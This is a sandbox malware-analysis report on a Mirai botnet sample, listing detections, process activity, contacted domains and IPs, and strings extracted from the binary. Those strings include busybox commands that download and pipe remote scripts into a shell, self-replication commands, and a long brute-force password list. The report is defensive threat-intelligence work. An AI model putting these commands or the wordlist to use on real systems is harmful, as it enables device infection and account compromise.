Edit tour

Linux Analysis Report
mpsl.elf

Overview

General Information

Sample name:	mpsl.elf
Analysis ID:	1611410
MD5:	006a9f92b1832282b8be08d734c54df9
SHA1:	1b1d9af01b6aa83488277ad3e76ff5e673b88ea1
SHA256:	e622a68781028bc9b322a1ad66d092295ac96203bd7adf39c19009de6e1146bb
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai

Score:	84
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Mirai

Connects to many ports of the same IP (likely port scanning)

Sample tries to kill multiple processes (SIGKILL)

Sends malformed DNS queries

Detected TCP or UDP traffic on non-standard ports

Executes the "rm" command used to delete files or directories

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings indicative of password brute-forcing capabilities

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1611410
Start date and time:	2025-02-10 21:07:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	mpsl.elf
Detection:	MAL
Classification:	mal84.spre.troj.linELF@0/0@22/0

Warnings

VT rate limit hit for: cats-master.ru. [malformed]
VT rate limit hit for: gokittler.ru. [malformed]
VT rate limit hit for: thekittler.ru. [malformed]

Runtime Messages

Command:	/tmp/mpsl.elf
PID:	6236
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	The Peoples Bank of China.
Standard Error:

Process Tree

system is lnxubuntu20

mpsl.elf (PID: 6236, Parent: 6160, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mpsl.elf

mpsl.elf New Fork (PID: 6239, Parent: 6236)

mpsl.elf New Fork (PID: 6241, Parent: 6239)

mpsl.elf New Fork (PID: 6245, Parent: 6239)

mpsl.elf New Fork (PID: 6246, Parent: 6239)

gdm3 New Fork (PID: 6271, Parent: 1320)

Default (PID: 6271, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

xfce4-session New Fork (PID: 6272, Parent: 1900)

gdm3 New Fork (PID: 6276, Parent: 1320)

Default (PID: 6276, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

xfce4-session New Fork (PID: 6277, Parent: 1900)

xfce4-session New Fork (PID: 6278, Parent: 1900)

rm (PID: 6278, Parent: 1900, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51

xfce4-session New Fork (PID: 6279, Parent: 1900)

xfce4-session New Fork (PID: 6280, Parent: 1900)

xfwm4 (PID: 6280, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c

xfce4-session New Fork (PID: 6282, Parent: 1900)

xfdesktop (PID: 6282, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542

xfce4-session New Fork (PID: 6284, Parent: 1900)

xfce4-panel (PID: 6284, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec

xfce4-session New Fork (PID: 6286, Parent: 1900)

xfwm4 (PID: 6286, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c

xfce4-session New Fork (PID: 6287, Parent: 1900)

xfce4-session New Fork (PID: 6288, Parent: 1900)

xfce4-session New Fork (PID: 6289, Parent: 1900)

xfwm4 (PID: 6289, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c

xfce4-session New Fork (PID: 6291, Parent: 1900)

xfdesktop (PID: 6291, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
mpsl.elf	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
mpsl.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
6245.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6245.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6236.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6236.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6241.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6241.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: mpsl.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: mpsl.elf

ReversingLabs: Detection: 42%

Source: mpsl.elf

String: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.93.89.106 ports 38241,1,2,3,4,8

Sends malformed DNS queries

Source: global traffic	DNS traffic detected: malformed DNS query: gokittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: kittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: cats-master.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: thekittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: qittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: cuttiecats.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: polizei.su. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: kittlez.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: mykittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: cat-are-here.ru. [malformed]

Source: global traffic

TCP traffic: 192.168.2.23:39752 -> 185.93.89.106:38241

Source: /tmp/mpsl.elf (PID: 6236)

Socket: 127.0.0.1:39148

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 200.75.33.18
Source: unknown	TCP traffic detected without corresponding DNS query: 120.128.61.54
Source: unknown	TCP traffic detected without corresponding DNS query: 173.161.235.67
Source: unknown	TCP traffic detected without corresponding DNS query: 103.55.183.129
Source: unknown	TCP traffic detected without corresponding DNS query: 131.147.132.9
Source: unknown	TCP traffic detected without corresponding DNS query: 74.69.249.210
Source: unknown	TCP traffic detected without corresponding DNS query: 41.126.85.162
Source: unknown	TCP traffic detected without corresponding DNS query: 21.205.134.202
Source: unknown	TCP traffic detected without corresponding DNS query: 9.138.94.12
Source: unknown	TCP traffic detected without corresponding DNS query: 2.229.119.203
Source: unknown	TCP traffic detected without corresponding DNS query: 34.111.106.211
Source: unknown	TCP traffic detected without corresponding DNS query: 119.174.32.119
Source: unknown	TCP traffic detected without corresponding DNS query: 115.96.123.252
Source: unknown	TCP traffic detected without corresponding DNS query: 84.148.98.147
Source: unknown	TCP traffic detected without corresponding DNS query: 61.226.72.47
Source: unknown	TCP traffic detected without corresponding DNS query: 198.125.69.222
Source: unknown	TCP traffic detected without corresponding DNS query: 167.57.47.185
Source: unknown	TCP traffic detected without corresponding DNS query: 48.130.37.45
Source: unknown	TCP traffic detected without corresponding DNS query: 113.91.171.126
Source: unknown	TCP traffic detected without corresponding DNS query: 94.105.81.74
Source: unknown	TCP traffic detected without corresponding DNS query: 85.25.61.237
Source: unknown	TCP traffic detected without corresponding DNS query: 212.237.38.75
Source: unknown	TCP traffic detected without corresponding DNS query: 173.161.235.67
Source: unknown	TCP traffic detected without corresponding DNS query: 200.75.33.18
Source: unknown	TCP traffic detected without corresponding DNS query: 120.128.61.54
Source: unknown	TCP traffic detected without corresponding DNS query: 103.55.183.129
Source: unknown	TCP traffic detected without corresponding DNS query: 131.147.132.9
Source: unknown	TCP traffic detected without corresponding DNS query: 21.205.134.202
Source: unknown	TCP traffic detected without corresponding DNS query: 41.126.85.162
Source: unknown	TCP traffic detected without corresponding DNS query: 9.138.94.12
Source: unknown	TCP traffic detected without corresponding DNS query: 74.69.249.210
Source: unknown	TCP traffic detected without corresponding DNS query: 119.174.32.119
Source: unknown	TCP traffic detected without corresponding DNS query: 34.111.106.211
Source: unknown	TCP traffic detected without corresponding DNS query: 2.229.119.203
Source: unknown	TCP traffic detected without corresponding DNS query: 115.96.123.252
Source: unknown	TCP traffic detected without corresponding DNS query: 84.148.98.147
Source: unknown	TCP traffic detected without corresponding DNS query: 198.125.69.222
Source: unknown	TCP traffic detected without corresponding DNS query: 167.57.47.185
Source: unknown	TCP traffic detected without corresponding DNS query: 48.130.37.45
Source: unknown	TCP traffic detected without corresponding DNS query: 94.105.81.74
Source: unknown	TCP traffic detected without corresponding DNS query: 85.25.61.237
Source: unknown	TCP traffic detected without corresponding DNS query: 61.226.72.47
Source: unknown	TCP traffic detected without corresponding DNS query: 113.91.171.126
Source: unknown	TCP traffic detected without corresponding DNS query: 212.237.38.75
Source: unknown	TCP traffic detected without corresponding DNS query: 179.227.37.131
Source: unknown	TCP traffic detected without corresponding DNS query: 179.227.37.131
Source: unknown	TCP traffic detected without corresponding DNS query: 119.91.247.155
Source: unknown	TCP traffic detected without corresponding DNS query: 119.91.247.155
Source: unknown	TCP traffic detected without corresponding DNS query: 195.25.99.200
Source: unknown	TCP traffic detected without corresponding DNS query: 195.25.99.200

Source: global traffic	DNS traffic detected: DNS query: newkittler.ru
Source: global traffic	DNS traffic detected: DNS query: gokittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: cats-master.ru
Source: global traffic	DNS traffic detected: DNS query: kittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: kittlerer.ru
Source: global traffic	DNS traffic detected: DNS query: cats-master.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: thekittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: qittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: cuttiecats.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: polizei.su. [malformed]
Source: global traffic	DNS traffic detected: DNS query: kittlez.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: mykittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: cat-are-here.ru. [malformed]

Source: mpsl.elf	String found in binary or memory: http:///curl.sh
Source: mpsl.elf	String found in binary or memory: http:///wget.sh

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 904, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1576, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1612, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1900, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2028, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2050, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2062, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2063, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2069, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2123, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6218, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6241, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6245, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6272, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6277, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6278, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6279, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6280, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6281, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6282, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6283, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6284, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6285, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6286, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6287, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6288, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6289, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6290, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6291, result: successful	Jump to behavior

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample	String containing 'busybox' found: /wget.sh -O- \| sh;/bin/busybox tftp -g
Source: Initial sample	String containing 'busybox' found: -r tftp.sh -l- \| sh;/bin/busybox ftpget
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- \| sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne >> > .d

Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: 654321
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: admin1234
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: supervisor

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 904, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1576, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1612, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1900, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2028, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2050, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2062, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2063, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2069, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2123, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6218, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6241, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6245, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6272, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6277, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6278, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6279, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6280, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6281, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6282, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6283, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6284, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6285, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6286, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6287, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6288, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6289, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6290, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 6246)	SIGKILL sent: pid: 6291, result: successful	Jump to behavior

Source: classification engine

Classification label: mal84.spre.troj.linELF@0/0@22/0

Source: /usr/bin/xfce4-session (PID: 6278)

Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51

Jump to behavior

Source: /tmp/mpsl.elf (PID: 6236)

Queries kernel information via 'uname':

Jump to behavior

Source: mpsl.elf, 6236.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmp, mpsl.elf, 6241.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmp, mpsl.elf, 6245.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: mpsl.elf	Binary or memory string: vmware
Source: mpsl.elf	Binary or memory string: vmware123
Source: mpsl.elf	Binary or memory string: nE7jA%5mmicrobusinessPASSWORDmeinsmcms500adslnadamgiraff666666zoomadslsuperadminIs@dminikwbalpineasantepuconexantaquariotinitsunamivertex25ektks123inflectionip20anicuscADMINpermitpldtadminonexantdvr2580222Win1doW$true5432112341234JVC3500/24sitecom46ironport88888888uClinuxvolition2800tslinuxsecurityatlantis888888nCwMnJVGagbaby00000000openelec1111111kont2004rpitc123123696969362729atc456hp.comcycl3R0cks!letacla000000nosoup4u11111111Gin51mvf3mg3500merlin99999999admin1anni201322222mlusrlogin3333333adminpldtbbsd-clientchangeme2support123aerohiveadmin00vmware123utstartl789l3tm31nseiko2005tivonpw,ba23422222222admintrupt1789admdarkcusadminhighspeedascendMenarasysAdmin33333oracleanicust3333wbox123attackAscendAitbISP4eCiGadmin@mymifi2222222dPZb4GJTu9ROOMeins1988321piloucomcastsetupZmqVfoSIP333333michelangeloCOadmin123Zntslqblendervt100admin_1pfsensehellotest1my_DEMARCjvswitchezdvr7ujMko0root/ADMIN/adminlvjhadminlvjh1232010vstaxmhdpicruntop10qwertyQwestM0demqweasdzxguest123h2014071TANDBERGWprootarkeiachangemenowf00b@rarticawww9311supersurtiwkbadmintesthuigu309UsernetscreenpitaZz@23495859Root1password123fidel123annie2016asdfghdottietwe8ehomebatman123hackedwelcomeyellowD13hh[china123p@ssw0rdjordanhackmewagodasdec1patrickgforgeEminemspidermansparkypassword1shadowgatewaydiamondprincessflowerchelsearichardFootballpornsexycamarofalconwhorebigdogChongqingcuntmartin12121212bitchcheeseHustonsecretpassword123456789Metallicacowboy1999654321slipknotstarwarsCharlie1997daddyRootdragonhustonfuckmepussytrustno1cowboysfootballsmcadminsysadmvmwareprofensegamezlrkr0x123qwesuperuserIntraStackAsantecraftcrftpwfriendrootmeP@55w0rd!debugrainCisconsrootinformixmediatorqwe123db2fenc1ibmdb2forgotvideoinfobloxdb2inst1nagiosxiiclocktimelyenablediagdraytekdbadminsq!us3rglftpddiagdangerapcAlphanetworkswrgg15_di524adminHWapacheabcwebserverapache123arpwatchavinashaspbackupadminazzakhalelbackuppukcabasteriskbackupscmhealthbadservercactielliebackup1234cloudcbscbs123billsupermenbenutzerpasswortftp1234annie2013annie2015annie2012annie2014jvcepicrouter
Source: mpsl.elf, 6236.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmp, mpsl.elf, 6241.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmp, mpsl.elf, 6245.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: mpsl.elf, 6236.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmp, mpsl.elf, 6241.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmp, mpsl.elf, 6245.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmp	Binary or memory string: :x86_64/usr/bin/qemu-mipsel/tmp/mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mpsl.elf
Source: mpsl.elf, 6245.1.00007f65ec462000.00007f65ec497000.rw-.sdmp	Binary or memory string: vmware123F
